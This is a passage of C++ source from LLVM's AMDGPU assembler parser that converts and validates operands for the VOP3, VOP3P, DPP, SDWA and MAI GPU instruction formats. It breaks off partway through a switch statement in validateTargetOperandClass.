void AMDGPUAsmParser::cvtVOP3OpSel(MCInst &Inst, const OperandVector &Operands) {
cvtVOP3P(Inst, Operands);
int Opc = Inst.getOpcode();
int SrcNum;
const int Ops[] = { AMDGPU::OpName::src0,
AMDGPU::OpName::src1,
AMDGPU::OpName::src2 };
for (SrcNum = 0;
SrcNum < 3 && AMDGPU::getNamedOperandIdx(Opc, Ops[SrcNum]) != -1;
++SrcNum);
assert(SrcNum > 0);
int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
unsigned OpSel = Inst.getOperand(OpSelIdx).getImm();
if ((OpSel & (1 << SrcNum)) != 0) {
int ModIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers);
uint32_t ModVal = Inst.getOperand(ModIdx).getImm();
Inst.getOperand(ModIdx).setImm(ModVal | SISrcMods::DST_OP_SEL);
}
}
static bool isRegOrImmWithInputMods(const MCInstrDesc &Desc, unsigned OpNum) {
// 1. This operand is input modifiers
return Desc.OpInfo[OpNum].OperandType == AMDGPU::OPERAND_INPUT_MODS
// 2. This is not last operand
&& Desc.NumOperands > (OpNum + 1)
// 3. Next operand is register class
&& Desc.OpInfo[OpNum + 1].RegClass != -1
// 4. Next register is not tied to any other operand
&& Desc.getOperandConstraint(OpNum + 1, MCOI::OperandConstraint::TIED_TO) == -1;
}
void AMDGPUAsmParser::cvtVOP3Interp(MCInst &Inst, const OperandVector &Operands)
{
OptionalImmIndexMap OptionalIdx;
unsigned Opc = Inst.getOpcode();
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegOrImmWithFPInputModsOperands(Inst, 2);
} else if (Op.isInterpSlot() ||
Op.isInterpAttr() ||
Op.isAttrChan()) {
Inst.addOperand(MCOperand::createImm(Op.getImm()));
} else if (Op.isImmModifier()) {
OptionalIdx[Op.getImmTy()] = I;
} else {
llvm_unreachable("unhandled operand type");
}
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::high) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyHigh);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI);
}
}
void AMDGPUAsmParser::cvtVOP3(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx) {
unsigned Opc = Inst.getOpcode();
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers) != -1) {
// This instruction has src modifiers
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegOrImmWithFPInputModsOperands(Inst, 2);
} else if (Op.isImmModifier()) {
OptionalIdx[Op.getImmTy()] = I;
} else if (Op.isRegOrImm()) {
Op.addRegOrImmOperands(Inst, 1);
} else {
llvm_unreachable("unhandled operand type");
}
}
} else {
// No src modifiers
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (Op.isMod()) {
OptionalIdx[Op.getImmTy()] = I;
} else {
Op.addRegOrImmOperands(Inst, 1);
}
}
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::clamp) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI);
}
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI);
}
// Special case v_mac_{f16, f32} and v_fmac_{f16, f32} (gfx906/gfx10+):
// it has src2 register operand that is tied to dst operand
// we don't allow modifiers for this operand in assembler so src2_modifiers
// should be 0.
if (Opc == AMDGPU::V_MAC_F32_e64_gfx6_gfx7 ||
Opc == AMDGPU::V_MAC_F32_e64_gfx10 ||
Opc == AMDGPU::V_MAC_F32_e64_vi ||
Opc == AMDGPU::V_MAC_LEGACY_F32_e64_gfx6_gfx7 ||
Opc == AMDGPU::V_MAC_LEGACY_F32_e64_gfx10 ||
Opc == AMDGPU::V_MAC_F16_e64_vi ||
Opc == AMDGPU::V_FMAC_F64_e64_gfx90a ||
Opc == AMDGPU::V_FMAC_F32_e64_gfx10 ||
Opc == AMDGPU::V_FMAC_F32_e64_vi ||
Opc == AMDGPU::V_FMAC_LEGACY_F32_e64_gfx10 ||
Opc == AMDGPU::V_FMAC_F16_e64_gfx10) {
auto it = Inst.begin();
std::advance(it, AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src2_modifiers));
it = Inst.insert(it, MCOperand::createImm(0)); // no modifiers for src2
++it;
// Copy the operand to ensure it's not invalidated when Inst grows.
Inst.insert(it, MCOperand(Inst.getOperand(0))); // src2 = dst
}
}
void AMDGPUAsmParser::cvtVOP3(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptionalIdx;
cvtVOP3(Inst, Operands, OptionalIdx);
}
void AMDGPUAsmParser::cvtVOP3P(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptIdx) {
const int Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
const bool IsPacked = (Desc.TSFlags & SIInstrFlags::IsPacked) != 0;
if (AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::vdst_in) != -1) {
assert(!IsPacked);
Inst.addOperand(Inst.getOperand(0));
}
// FIXME: This is messy. Parse the modifiers as if it was a normal VOP3
// instruction, and then figure out where to actually put the modifiers
int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
if (OpSelIdx != -1) {
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyOpSel);
}
int OpSelHiIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel_hi);
if (OpSelHiIdx != -1) {
int DefaultVal = IsPacked ? -1 : 0;
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyOpSelHi,
DefaultVal);
}
int NegLoIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::neg_lo);
if (NegLoIdx != -1) {
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyNegLo);
addOptionalImmOperand(Inst, Operands, OptIdx, AMDGPUOperand::ImmTyNegHi);
}
const int Ops[] = { AMDGPU::OpName::src0,
AMDGPU::OpName::src1,
AMDGPU::OpName::src2 };
const int ModOps[] = { AMDGPU::OpName::src0_modifiers,
AMDGPU::OpName::src1_modifiers,
AMDGPU::OpName::src2_modifiers };
unsigned OpSel = 0;
unsigned OpSelHi = 0;
unsigned NegLo = 0;
unsigned NegHi = 0;
if (OpSelIdx != -1)
OpSel = Inst.getOperand(OpSelIdx).getImm();
if (OpSelHiIdx != -1)
OpSelHi = Inst.getOperand(OpSelHiIdx).getImm();
if (NegLoIdx != -1) {
int NegHiIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::neg_hi);
NegLo = Inst.getOperand(NegLoIdx).getImm();
NegHi = Inst.getOperand(NegHiIdx).getImm();
}
for (int J = 0; J < 3; ++J) {
int OpIdx = AMDGPU::getNamedOperandIdx(Opc, Ops[J]);
if (OpIdx == -1)
break;
uint32_t ModVal = 0;
if ((OpSel & (1 << J)) != 0)
ModVal |= SISrcMods::OP_SEL_0;
if ((OpSelHi & (1 << J)) != 0)
ModVal |= SISrcMods::OP_SEL_1;
if ((NegLo & (1 << J)) != 0)
ModVal |= SISrcMods::NEG;
if ((NegHi & (1 << J)) != 0)
ModVal |= SISrcMods::NEG_HI;
int ModIdx = AMDGPU::getNamedOperandIdx(Opc, ModOps[J]);
Inst.getOperand(ModIdx).setImm(Inst.getOperand(ModIdx).getImm() | ModVal);
}
}
void AMDGPUAsmParser::cvtVOP3P(MCInst &Inst, const OperandVector &Operands) {
OptionalImmIndexMap OptIdx;
cvtVOP3(Inst, Operands, OptIdx);
cvtVOP3P(Inst, Operands, OptIdx);
}
//===----------------------------------------------------------------------===//
// dpp
//===----------------------------------------------------------------------===//
bool AMDGPUOperand::isDPP8() const {
return isImmTy(ImmTyDPP8);
}
bool AMDGPUOperand::isDPPCtrl() const {
using namespace AMDGPU::DPP;
bool result = isImm() && getImmTy() == ImmTyDppCtrl && isUInt<9>(getImm());
if (result) {
int64_t Imm = getImm();
return (Imm >= DppCtrl::QUAD_PERM_FIRST && Imm <= DppCtrl::QUAD_PERM_LAST) ||
(Imm >= DppCtrl::ROW_SHL_FIRST && Imm <= DppCtrl::ROW_SHL_LAST) ||
(Imm >= DppCtrl::ROW_SHR_FIRST && Imm <= DppCtrl::ROW_SHR_LAST) ||
(Imm >= DppCtrl::ROW_ROR_FIRST && Imm <= DppCtrl::ROW_ROR_LAST) ||
(Imm == DppCtrl::WAVE_SHL1) ||
(Imm == DppCtrl::WAVE_ROL1) ||
(Imm == DppCtrl::WAVE_SHR1) ||
(Imm == DppCtrl::WAVE_ROR1) ||
(Imm == DppCtrl::ROW_MIRROR) ||
(Imm == DppCtrl::ROW_HALF_MIRROR) ||
(Imm == DppCtrl::BCAST15) ||
(Imm == DppCtrl::BCAST31) ||
(Imm >= DppCtrl::ROW_SHARE_FIRST && Imm <= DppCtrl::ROW_SHARE_LAST) ||
(Imm >= DppCtrl::ROW_XMASK_FIRST && Imm <= DppCtrl::ROW_XMASK_LAST);
}
return false;
}
//===----------------------------------------------------------------------===//
// mAI
//===----------------------------------------------------------------------===//
bool AMDGPUOperand::isBLGP() const {
return isImm() && getImmTy() == ImmTyBLGP && isUInt<3>(getImm());
}
bool AMDGPUOperand::isCBSZ() const {
return isImm() && getImmTy() == ImmTyCBSZ && isUInt<3>(getImm());
}
bool AMDGPUOperand::isABID() const {
return isImm() && getImmTy() == ImmTyABID && isUInt<4>(getImm());
}
bool AMDGPUOperand::isS16Imm() const {
return isImm() && (isInt<16>(getImm()) || isUInt<16>(getImm()));
}
bool AMDGPUOperand::isU16Imm() const {
return isImm() && isUInt<16>(getImm());
}
//===----------------------------------------------------------------------===//
// dim
//===----------------------------------------------------------------------===//
bool AMDGPUAsmParser::parseDimId(unsigned &Encoding) {
// We want to allow "dim:1D" etc.,
// but the initial 1 is tokenized as an integer.
std::string Token;
if (isToken(AsmToken::Integer)) {
SMLoc Loc = getToken().getEndLoc();
Token = std::string(getTokenStr());
lex();
if (getLoc() != Loc)
return false;
}
StringRef Suffix;
if (!parseId(Suffix))
return false;
Token += Suffix;
StringRef DimId = Token;
if (DimId.startswith("SQ_RSRC_IMG_"))
DimId = DimId.drop_front(12);
const AMDGPU::MIMGDimInfo *DimInfo = AMDGPU::getMIMGDimInfoByAsmSuffix(DimId);
if (!DimInfo)
return false;
Encoding = DimInfo->Encoding;
return true;
}
OperandMatchResultTy AMDGPUAsmParser::parseDim(OperandVector &Operands) {
if (!isGFX10Plus())
return MatchOperand_NoMatch;
SMLoc S = getLoc();
if (!trySkipId("dim", AsmToken::Colon))
return MatchOperand_NoMatch;
unsigned Encoding;
SMLoc Loc = getLoc();
if (!parseDimId(Encoding)) {
Error(Loc, "invalid dim value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Encoding, S,
AMDGPUOperand::ImmTyDim));
return MatchOperand_Success;
}
//===----------------------------------------------------------------------===//
// dpp
//===----------------------------------------------------------------------===//
OperandMatchResultTy AMDGPUAsmParser::parseDPP8(OperandVector &Operands) {
SMLoc S = getLoc();
if (!isGFX10Plus() || !trySkipId("dpp8", AsmToken::Colon))
return MatchOperand_NoMatch;
// dpp8:[%d,%d,%d,%d,%d,%d,%d,%d]
int64_t Sels[8];
if (!skipToken(AsmToken::LBrac, "expected an opening square bracket"))
return MatchOperand_ParseFail;
for (size_t i = 0; i < 8; ++i) {
if (i > 0 && !skipToken(AsmToken::Comma, "expected a comma"))
return MatchOperand_ParseFail;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Sels[i]))
return MatchOperand_ParseFail;
if (0 > Sels[i] || 7 < Sels[i]) {
Error(Loc, "expected a 3-bit value");
return MatchOperand_ParseFail;
}
}
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return MatchOperand_ParseFail;
unsigned DPP8 = 0;
for (size_t i = 0; i < 8; ++i)
DPP8 |= (Sels[i] << (i * 3));
Operands.push_back(AMDGPUOperand::CreateImm(this, DPP8, S, AMDGPUOperand::ImmTyDPP8));
return MatchOperand_Success;
}
bool
AMDGPUAsmParser::isSupportedDPPCtrl(StringRef Ctrl,
const OperandVector &Operands) {
if (Ctrl == "row_newbcast")
return isGFX90A();
if (Ctrl == "row_share" ||
Ctrl == "row_xmask")
return isGFX10Plus();
if (Ctrl == "wave_shl" ||
Ctrl == "wave_shr" ||
Ctrl == "wave_rol" ||
Ctrl == "wave_ror" ||
Ctrl == "row_bcast")
return isVI() || isGFX9();
return Ctrl == "row_mirror" ||
Ctrl == "row_half_mirror" ||
Ctrl == "quad_perm" ||
Ctrl == "row_shl" ||
Ctrl == "row_shr" ||
Ctrl == "row_ror";
}
int64_t
AMDGPUAsmParser::parseDPPCtrlPerm() {
// quad_perm:[%d,%d,%d,%d]
if (!skipToken(AsmToken::LBrac, "expected an opening square bracket"))
return -1;
int64_t Val = 0;
for (int i = 0; i < 4; ++i) {
if (i > 0 && !skipToken(AsmToken::Comma, "expected a comma"))
return -1;
int64_t Temp;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Temp))
return -1;
if (Temp < 0 || Temp > 3) {
Error(Loc, "expected a 2-bit value");
return -1;
}
Val += (Temp << i * 2);
}
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return -1;
return Val;
}
int64_t
AMDGPUAsmParser::parseDPPCtrlSel(StringRef Ctrl) {
using namespace AMDGPU::DPP;
// sel:%d
int64_t Val;
SMLoc Loc = getLoc();
if (getParser().parseAbsoluteExpression(Val))
return -1;
struct DppCtrlCheck {
int64_t Ctrl;
int Lo;
int Hi;
};
DppCtrlCheck Check = StringSwitch<DppCtrlCheck>(Ctrl)
.Case("wave_shl", {DppCtrl::WAVE_SHL1, 1, 1})
.Case("wave_rol", {DppCtrl::WAVE_ROL1, 1, 1})
.Case("wave_shr", {DppCtrl::WAVE_SHR1, 1, 1})
.Case("wave_ror", {DppCtrl::WAVE_ROR1, 1, 1})
.Case("row_shl", {DppCtrl::ROW_SHL0, 1, 15})
.Case("row_shr", {DppCtrl::ROW_SHR0, 1, 15})
.Case("row_ror", {DppCtrl::ROW_ROR0, 1, 15})
.Case("row_share", {DppCtrl::ROW_SHARE_FIRST, 0, 15})
.Case("row_xmask", {DppCtrl::ROW_XMASK_FIRST, 0, 15})
.Case("row_newbcast", {DppCtrl::ROW_NEWBCAST_FIRST, 0, 15})
.Default({-1, 0, 0});
bool Valid;
if (Check.Ctrl == -1) {
Valid = (Ctrl == "row_bcast" && (Val == 15 || Val == 31));
Val = (Val == 15)? DppCtrl::BCAST15 : DppCtrl::BCAST31;
} else {
Valid = Check.Lo <= Val && Val <= Check.Hi;
Val = (Check.Lo == Check.Hi) ? Check.Ctrl : (Check.Ctrl | Val);
}
if (!Valid) {
Error(Loc, Twine("invalid ", Ctrl) + Twine(" value"));
return -1;
}
return Val;
}
OperandMatchResultTy
AMDGPUAsmParser::parseDPPCtrl(OperandVector &Operands) {
using namespace AMDGPU::DPP;
if (!isToken(AsmToken::Identifier) ||
!isSupportedDPPCtrl(getTokenStr(), Operands))
return MatchOperand_NoMatch;
SMLoc S = getLoc();
int64_t Val = -1;
StringRef Ctrl;
parseId(Ctrl);
if (Ctrl == "row_mirror") {
Val = DppCtrl::ROW_MIRROR;
} else if (Ctrl == "row_half_mirror") {
Val = DppCtrl::ROW_HALF_MIRROR;
} else {
if (skipToken(AsmToken::Colon, "expected a colon")) {
if (Ctrl == "quad_perm") {
Val = parseDPPCtrlPerm();
} else {
Val = parseDPPCtrlSel(Ctrl);
}
}
}
if (Val == -1)
return MatchOperand_ParseFail;
Operands.push_back(
AMDGPUOperand::CreateImm(this, Val, S, AMDGPUOperand::ImmTyDppCtrl));
return MatchOperand_Success;
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultRowMask() const {
return AMDGPUOperand::CreateImm(this, 0xf, SMLoc(), AMDGPUOperand::ImmTyDppRowMask);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultEndpgmImmOperands() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyEndpgm);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBankMask() const {
return AMDGPUOperand::CreateImm(this, 0xf, SMLoc(), AMDGPUOperand::ImmTyDppBankMask);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBoundCtrl() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyDppBoundCtrl);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultFI() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyDppFi);
}
void AMDGPUAsmParser::cvtDPP(MCInst &Inst, const OperandVector &Operands, bool IsDPP8) {
OptionalImmIndexMap OptionalIdx;
unsigned Opc = Inst.getOpcode();
bool HasModifiers =
AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0_modifiers) != -1;
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
int Fi = 0;
for (unsigned E = Operands.size(); I != E; ++I) {
auto TiedTo = Desc.getOperandConstraint(Inst.getNumOperands(),
MCOI::TIED_TO);
if (TiedTo != -1) {
assert((unsigned)TiedTo < Inst.getNumOperands());
// handle tied old or src2 for MAC instructions
Inst.addOperand(Inst.getOperand(TiedTo));
}
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
// Add the register arguments
if (Op.isReg() && validateVccOperand(Op.getReg())) {
// VOP2b (v_add_u32, v_sub_u32 ...) dpp use "vcc" token.
// Skip it.
continue;
}
if (IsDPP8) {
if (Op.isDPP8()) {
Op.addImmOperands(Inst, 1);
} else if (HasModifiers &&
isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegWithFPInputModsOperands(Inst, 2);
} else if (Op.isFI()) {
Fi = Op.getImm();
} else if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
} else {
llvm_unreachable("Invalid operand type");
}
} else {
if (HasModifiers &&
isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegWithFPInputModsOperands(Inst, 2);
} else if (Op.isReg()) {
Op.addRegOperands(Inst, 1);
} else if (Op.isDPPCtrl()) {
Op.addImmOperands(Inst, 1);
} else if (Op.isImm()) {
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = I;
} else {
llvm_unreachable("Invalid operand type");
}
}
}
if (IsDPP8) {
using namespace llvm::AMDGPU::DPP;
Inst.addOperand(MCOperand::createImm(Fi? DPP8_FI_1 : DPP8_FI_0));
} else {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppRowMask, 0xf);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppBankMask, 0xf);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppBoundCtrl);
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::fi) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyDppFi);
}
}
}
//===----------------------------------------------------------------------===//
// sdwa
//===----------------------------------------------------------------------===//
OperandMatchResultTy
AMDGPUAsmParser::parseSDWASel(OperandVector &Operands, StringRef Prefix,
AMDGPUOperand::ImmTy Type) {
using namespace llvm::AMDGPU::SDWA;
SMLoc S = getLoc();
StringRef Value;
OperandMatchResultTy res;
SMLoc StringLoc;
res = parseStringWithPrefix(Prefix, Value, StringLoc);
if (res != MatchOperand_Success) {
return res;
}
int64_t Int;
Int = StringSwitch<int64_t>(Value)
.Case("BYTE_0", SdwaSel::BYTE_0)
.Case("BYTE_1", SdwaSel::BYTE_1)
.Case("BYTE_2", SdwaSel::BYTE_2)
.Case("BYTE_3", SdwaSel::BYTE_3)
.Case("WORD_0", SdwaSel::WORD_0)
.Case("WORD_1", SdwaSel::WORD_1)
.Case("DWORD", SdwaSel::DWORD)
.Default(0xffffffff);
if (Int == 0xffffffff) {
Error(StringLoc, "invalid " + Twine(Prefix) + " value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Int, S, Type));
return MatchOperand_Success;
}
OperandMatchResultTy
AMDGPUAsmParser::parseSDWADstUnused(OperandVector &Operands) {
using namespace llvm::AMDGPU::SDWA;
SMLoc S = getLoc();
StringRef Value;
OperandMatchResultTy res;
SMLoc StringLoc;
res = parseStringWithPrefix("dst_unused", Value, StringLoc);
if (res != MatchOperand_Success) {
return res;
}
int64_t Int;
Int = StringSwitch<int64_t>(Value)
.Case("UNUSED_PAD", DstUnused::UNUSED_PAD)
.Case("UNUSED_SEXT", DstUnused::UNUSED_SEXT)
.Case("UNUSED_PRESERVE", DstUnused::UNUSED_PRESERVE)
.Default(0xffffffff);
if (Int == 0xffffffff) {
Error(StringLoc, "invalid dst_unused value");
return MatchOperand_ParseFail;
}
Operands.push_back(AMDGPUOperand::CreateImm(this, Int, S, AMDGPUOperand::ImmTySdwaDstUnused));
return MatchOperand_Success;
}
void AMDGPUAsmParser::cvtSdwaVOP1(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP1);
}
void AMDGPUAsmParser::cvtSdwaVOP2(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2);
}
void AMDGPUAsmParser::cvtSdwaVOP2b(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2, true, true);
}
void AMDGPUAsmParser::cvtSdwaVOP2e(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOP2, false, true);
}
void AMDGPUAsmParser::cvtSdwaVOPC(MCInst &Inst, const OperandVector &Operands) {
cvtSDWA(Inst, Operands, SIInstrFlags::VOPC, isVI());
}
void AMDGPUAsmParser::cvtSDWA(MCInst &Inst, const OperandVector &Operands,
uint64_t BasicInstType,
bool SkipDstVcc,
bool SkipSrcVcc) {
using namespace llvm::AMDGPU::SDWA;
OptionalImmIndexMap OptionalIdx;
bool SkipVcc = SkipDstVcc || SkipSrcVcc;
bool SkippedVcc = false;
unsigned I = 1;
const MCInstrDesc &Desc = MII.get(Inst.getOpcode());
for (unsigned J = 0; J < Desc.getNumDefs(); ++J) {
((AMDGPUOperand &)*Operands[I++]).addRegOperands(Inst, 1);
}
for (unsigned E = Operands.size(); I != E; ++I) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[I]);
if (SkipVcc && !SkippedVcc && Op.isReg() &&
(Op.getReg() == AMDGPU::VCC || Op.getReg() == AMDGPU::VCC_LO)) {
// VOP2b (v_add_u32, v_sub_u32 ...) sdwa use "vcc" token as dst.
// Skip it if it's 2nd (e.g. v_add_i32_sdwa v1, vcc, v2, v3)
// or 4th (v_addc_u32_sdwa v1, vcc, v2, v3, vcc) operand.
// Skip VCC only if we didn't skip it on previous iteration.
// Note that src0 and src1 occupy 2 slots each because of modifiers.
if (BasicInstType == SIInstrFlags::VOP2 &&
((SkipDstVcc && Inst.getNumOperands() == 1) ||
(SkipSrcVcc && Inst.getNumOperands() == 5))) {
SkippedVcc = true;
continue;
} else if (BasicInstType == SIInstrFlags::VOPC &&
Inst.getNumOperands() == 0) {
SkippedVcc = true;
continue;
}
}
if (isRegOrImmWithInputMods(Desc, Inst.getNumOperands())) {
Op.addRegOrImmWithInputModsOperands(Inst, 2);
} else if (Op.isImm()) {
// Handle optional arguments
OptionalIdx[Op.getImmTy()] = I;
} else {
llvm_unreachable("Invalid operand type");
}
SkippedVcc = false;
}
if (Inst.getOpcode() != AMDGPU::V_NOP_sdwa_gfx10 &&
Inst.getOpcode() != AMDGPU::V_NOP_sdwa_gfx9 &&
Inst.getOpcode() != AMDGPU::V_NOP_sdwa_vi) {
// v_nop_sdwa_sdwa_vi/gfx9 has no optional sdwa arguments
switch (BasicInstType) {
case SIInstrFlags::VOP1:
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI, 0);
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstSel, SdwaSel::DWORD);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstUnused, DstUnused::UNUSED_PRESERVE);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
break;
case SIInstrFlags::VOP2:
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::omod) != -1) {
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyOModSI, 0);
}
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstSel, SdwaSel::DWORD);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaDstUnused, DstUnused::UNUSED_PRESERVE);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc1Sel, SdwaSel::DWORD);
break;
case SIInstrFlags::VOPC:
if (AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::clamp) != -1)
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTyClampSI, 0);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc0Sel, SdwaSel::DWORD);
addOptionalImmOperand(Inst, Operands, OptionalIdx, AMDGPUOperand::ImmTySdwaSrc1Sel, SdwaSel::DWORD);
break;
default:
llvm_unreachable("Invalid instruction type. Only VOP1, VOP2 and VOPC allowed");
}
}
// special case v_mac_{f16, f32}:
// it has src2 register operand that is tied to dst operand
if (Inst.getOpcode() == AMDGPU::V_MAC_F32_sdwa_vi ||
Inst.getOpcode() == AMDGPU::V_MAC_F16_sdwa_vi) {
auto it = Inst.begin();
std::advance(
it, AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::src2));
Inst.insert(it, Inst.getOperand(0)); // src2 = dst
}
}
//===----------------------------------------------------------------------===//
// mAI
//===----------------------------------------------------------------------===//
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultBLGP() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyBLGP);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultCBSZ() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyCBSZ);
}
AMDGPUOperand::Ptr AMDGPUAsmParser::defaultABID() const {
return AMDGPUOperand::CreateImm(this, 0, SMLoc(), AMDGPUOperand::ImmTyABID);
}
/// Force static initialization.
extern "C" LLVM_EXTERNAL_VISIBILITY void LLVMInitializeAMDGPUAsmParser() {
RegisterMCAsmParser<AMDGPUAsmParser> A(getTheAMDGPUTarget());
RegisterMCAsmParser<AMDGPUAsmParser> B(getTheGCNTarget());
}
#define GET_REGISTER_MATCHER
#define GET_MATCHER_IMPLEMENTATION
#define GET_MNEMONIC_SPELL_CHECKER
#define GET_MNEMONIC_CHECKER
#include "AMDGPUGenAsmMatcher.inc"
// This function should be defined after auto-generated include so that we have
// MatchClassKind enum defined
unsigned AMDGPUAsmParser::validateTargetOperandClass(MCParsedAsmOperand &Op,
unsigned Kind) {
// Tokens like "glc" would be parsed as immediate operands in ParseOperand().
// But MatchInstructionImpl() expects to meet token and fails to validate
// operand. This method checks if we are given immediate operand but expect to
// get corresponding token.
AMDGPUOperand &Operand = (AMDGPUOperand&)Op;
switch (Kind) {
case MCK_addr64:
return Operand.isAddr64() ? Match_Success : Match_InvalidOperand;
case MCK_gds:
return Operand.isGDS() ? Match_Success : Match_InvalidOperand;
case MCK_lds:
